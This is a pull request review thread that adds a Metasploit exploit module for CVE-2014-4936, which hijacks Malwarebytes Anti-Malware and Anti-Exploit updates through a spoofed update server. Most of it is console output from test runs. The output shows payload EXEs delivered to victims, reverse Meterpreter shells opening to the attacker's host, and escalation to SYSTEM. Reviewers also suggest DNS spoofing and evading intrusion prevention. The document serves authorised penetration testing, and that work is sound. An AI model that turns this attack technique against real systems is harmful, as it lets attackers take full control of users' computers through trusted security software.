### PR TITLE
Add module for Malwarebytes Anti-Malware and Anti-Exploit (CVE-2014-4936)

### PR DESCRIPTION
**Pull request by sgabe**
This module exploits a vulnerability in the update functionality of Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes Anti-Exploit consumer 1.03.1.1220.
# Verification Steps
- [x] Spoof data-cdn.mbamupdates.com update server
- [x] Start malicious update server
- [x] Start application and/or manually trigger update

Note that in case of MBAE it takes approximetely 2 minutes for the client to request the update package.

Tested with MBAM 2.0.2.1012 and MBAE 1.03.1.1220, test run results below:

```
msf exploit(mbam_update_exec) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.186.129:4444 
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.186.129:80/
[*] Server started.
msf exploit(mbam_update_exec) > [*] 192.168.186.130  mbam_update_exec - MBAM connected
[*] 192.168.186.130  mbam_update_exec - Enforcing update to version 9.99.9.9999
[*] 192.168.186.130  mbam_update_exec - Sending payload EXE...
[*] Sending stage (770048 bytes) to 192.168.186.130
[*] Meterpreter session 1 opened (192.168.186.129:4444 -> 192.168.186.130:1281) at 2015-01-18 16:54:07 +0100
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.186.130 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(mbam_update_exec) > 
[*] 192.168.186.130  mbam_update_exec - MBAE connected
[*] 192.168.186.130  mbam_update_exec - Client may not be vulnerable
[*] 192.168.186.130  mbam_update_exec - Enforcing update to version 9.99.9.9999
[*] 192.168.186.130  mbam_update_exec - Sending payload EXE...
[*] Sending stage (770048 bytes) to 192.168.186.130
[*] Meterpreter session 2 opened (192.168.186.129:4444 -> 192.168.186.130:1286) at 2015-01-18 16:57:21 +0100
sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.186.130 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(mbam_update_exec) >
```

### CODE REVIEW

**Comment by todb-r7** [comment]
Neat. I bet the Metasploit dns spoofer module would do a fine job at faciliating this module, too.

**Comment by todb** [comment]
All the references talk about something called the GetGo Download manager.
I'd suggest renaming this module to reflect this... Or fixing the
references to be correct? I can't tell which is wrong here. Is GetGo a
component of the Malwarebytes? If so, the description should make this
clear.

--

**Comment by sgabe** [comment]
I just fixed the references.

**Comment by todb-r7** [comment]
Travis failure looks  unrelated, the disclosure date test seems a little flakey. /cc @limhoff-r7 see https://travis-ci.org/rapid7/metasploit-framework/builds/48202886

**Comment by todb** [comment]
So, since the issue is fixed in particular versions, wouldn't it be more
devious if the module offered a real, fixed version? Bonus points for
screwing up IPS. O:-)

-- 
Sent from a tiny computer.

**Comment by todb-r7** [comment]
Looks good to me!

````
[*] 10.6.255.152     mbam_update_exec - MBAM connected
[*] 10.6.255.152     mbam_update_exec - Enforcing update to version 2.0.3.1025
[*] 10.6.255.152     mbam_update_exec - Sending payload EXE...
[*] 10.6.255.152:49418 Request received for /a8xK...
[*] 10.6.255.152:49418 Staging connection for target /a8xK received...
[*] Meterpreter session 1 opened (10.6.255.226:8080 -> 10.6.255.152:49418) at 2015-01-28 10:05:24 -0600

msf exploit(mbam_update_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: VicTim-PC\Vic Tim
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

The funny bit is that when you restart the application, you pretty much immediately get owned again:

```
[*] 10.6.255.152:49677 Request received for /a8xK...
[*] 10.6.255.152:49677 Staging connection for target /a8xK received...
[*] Meterpreter session 2 opened (10.6.255.226:8080 -> 10.6.255.152:49677) at 2015-01-28 10:17:55 -0600
````

File: modules/exploits/windows/browser/mbam_update_exec.rb [hunk 1]
```diff
@@ -0,0 +1,107 @@
...
+    when "/v2/#{agent}/consumer/version.chk"
+      print_status("#{agent.upcase} connected")
+
+      unless ua
+        print_status("Client may not be vulnerable")
+      end
+
+      if ua && (ver = ua[/base:(\d+\.\d+\.\d+\.\d+)/,1]) &&
+         Gem::Version.new(ver) >= Gem::Version.new('2.0.3')
+        print_error("Client version #{ver} is not vulnerable")
```
Comment (todb-r7) [inline modules/exploits/windows/browser/mbam_update_exec.rb]: I'm going to un-multiline this `&&` conditional here.

Comment (todb-r7) [inline modules/exploits/windows/browser/mbam_update_exec.rb]: Oh hang on this is hella complicated. You have an assignment in here. Let me PR back real quick.

**Comment by todb-r7** [comment]
Okay, PR coming up . Still works for me, but I haven't done any negative testing yet. Turns out, once you have the poison setup.exe in there, it looks like it's in there for good, even when you unpoison DNS.

```
msf exploit(mbam_update_exec) > exploit -j
[*] Exploit running as background job.
msf exploit(mbam_update_exec) > 
[*] Started HTTP reverse handler on http://0.0.0.0:8080/
[*] Using URL: http://10.6.255.226:80/
[*] Server started.

msf exploit(mbam_update_exec) > 
[*] 10.6.255.152:50081 Request received for /a8xK...
[*] 10.6.255.152:50081 Staging connection for target /a8xK received...
[*] Meterpreter session 1 opened (10.6.255.226:8080 -> 10.6.255.152:50081) at 2015-01-28 10:58:39 -0600
[*] 10.6.255.152:50143 Request received for /a8xK...
[*] 10.6.255.152:50143 Staging connection for target /a8xK received...
[*] Meterpreter session 2 opened (10.6.255.226:8080 -> 10.6.255.152:50143) at 2015-01-28 10:59:12 -0600
[*] 10.6.255.152:50209 Request received for /a8xK...
[*] 10.6.255.152:50209 Staging connection for target /a8xK received...
[*] Meterpreter session 3 opened (10.6.255.226:8080 -> 10.6.255.152:50209) at 2015-01-28 10:59:44 -0600

```

**Comment by todb-r7** [comment]
Okay, ball's in @sgabe's court (or whomever else wants to do code review). I still love this module.

**Comment by todb-r7** [comment]
The PR for @sgabe is sgabe/metasploit-framework#4, btw.

**Comment by todb-r7** [comment]
Okay, here's the output now, with sgabe/metasploit-framework#4 , against a non-vulnerable instance:

```
msf exploit(mbam_update_exec) > 
[*] Started HTTP reverse handler on http://0.0.0.0:8080/
[*] Using URL: http://10.6.255.226:80/
[*] Server started.
[*] 10.6.255.152     mbam_update_exec - User-Agent 'MBAM' detected.
[-] 10.6.255.152     mbam_update_exec - Asked for /v2/mbam/net/consumer/version.chk, not an update. Aborting.
[*] 10.6.255.152     mbam_update_exec - User-Agent 'MBAM' detected.
[-] 10.6.255.152     mbam_update_exec - Asked for /v1/database/rules/version.chk, not an update. Aborting.
[*] 10.6.255.152     mbam_update_exec - User-Agent 'MBAM' detected.
[-] 10.6.255.152     mbam_update_exec - Asked for /v1/database/swissarmy/version.chk, not an update. Aborting.
[*] 10.6.255.152     mbam_update_exec - User-Agent 'MBAM' detected.
[-] 10.6.255.152     mbam_update_exec - Asked for /v1/database/actions/version.chk, not an update. Aborting.
[*] 10.6.255.152     mbam_update_exec - User-Agent 'MBAM' detected.
[-] 10.6.255.152     mbam_update_exec - Asked for /v1/database/domains/version.chk, not an update. Aborting.
[*] 10.6.255.152     mbam_update_exec - User-Agent 'MBAM' detected.
[-] 10.6.255.152     mbam_update_exec - Asked for /v1/database/ips/version.chk, not an update. Aborting.
[*] 10.6.255.152     mbam_update_exec - User-Agent 'MBAM' detected.
[-] 10.6.255.152     mbam_update_exec - Client version 2.0.4.1028 is not vulnerable, aborting.
```
I'm going to kick those extra messages to `vprint_error`. Otherwise, looks good to me. @sgabe or @wvu-r7 can you eyeball my Ruby?

**Comment by todb-r7** [comment]
Oh, and let's not try to pop non-matching user agents:

```
[*] Started HTTP reverse handler on http://0.0.0.0:8080/
[*] Using URL: http://10.6.255.226:80/
[*] Server started.
[*] 10.6.255.152     mbam_update_exec - 10.6.255.152     mbam_update_exec - User-Agent 'MOZI' detected.
[-] 10.6.255.152     mbam_update_exec - Unknown user agent connected, trying anyway.
[*] 10.6.255.152     mbam_update_exec - 10.6.255.152     mbam_update_exec - User-Agent 'MOZI' detected.
[-] 10.6.255.152     mbam_update_exec - Unknown user agent connected, trying anyway.
```

That fall through of trying anyway seems silly to me.

**Comment by todb-r7** [comment]
Discussing with @sgabe on sgabe/metasploit-framework#4

**Comment by todb-r7** [comment]
@sgabe I've updated my branch with a new version. Can you check to see that it still works for you for MBAE? It should but I haven't been able to locate a vulnerable copy. Seems to work well against both vuln and non-vuln versions:

````
[*] Started reverse handler on 192.168.145.1:4444 
[*] Using URL: http://192.168.145.1:80/
[*] Server started.
[*] Sending stage (770048 bytes) to 192.168.145.129
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v2/mbam/net/consumer/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v1/database/rules/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v1/database/swissarmy/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v1/database/actions/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v1/database/domains/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v1/database/ips/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - Updating Anti-Malware to (fake) 2.0.3.1025. The user may need to click 'OK'.
[*] Sending stage (770048 bytes) to 192.168.145.129
[*] Meterpreter session 7 opened (192.168.145.1:4444 -> 192.168.145.129:49436) at 2015-02-03 13:58:10 -0600
````

Non-vuln MBAM:

````
*] Started reverse handler on 192.168.145.1:4444 
[*] Using URL: http://192.168.145.1:80/
[*] Server started.
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Got a request for /v2/mbam/net/consumer/version.chk.
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v2/mbam/net/consumer/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Got a request for /v1/database/rules/version.chk.
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v1/database/rules/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Got a request for /v1/database/swissarmy/version.chk.
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v1/database/swissarmy/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Got a request for /v1/database/actions/version.chk.
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v1/database/actions/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Got a request for /v1/database/domains/version.chk.
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v1/database/domains/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Got a request for /v1/database/ips/version.chk.
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Sending empty page for /v1/database/ips/version.chk
[*] 192.168.145.129  malwarebytes_update_exec - 192.168.145.129  malwarebytes_update_exec - Got a request for /v2/mbam/consumer/version.chk.
[-] 192.168.145.129  malwarebytes_update_exec - Version 2.0.4.1028 of Anti-Malware isn't vulnerable, not attempting update.
````

See https://github.com/sgabe/metasploit-framework/pull/4

**Comment by todb-r7** [comment]
Note, those blank page notifications are only when verbose is set.

**Comment by todb-r7** [comment]
Thanks @sgabe!

**Pull request merged**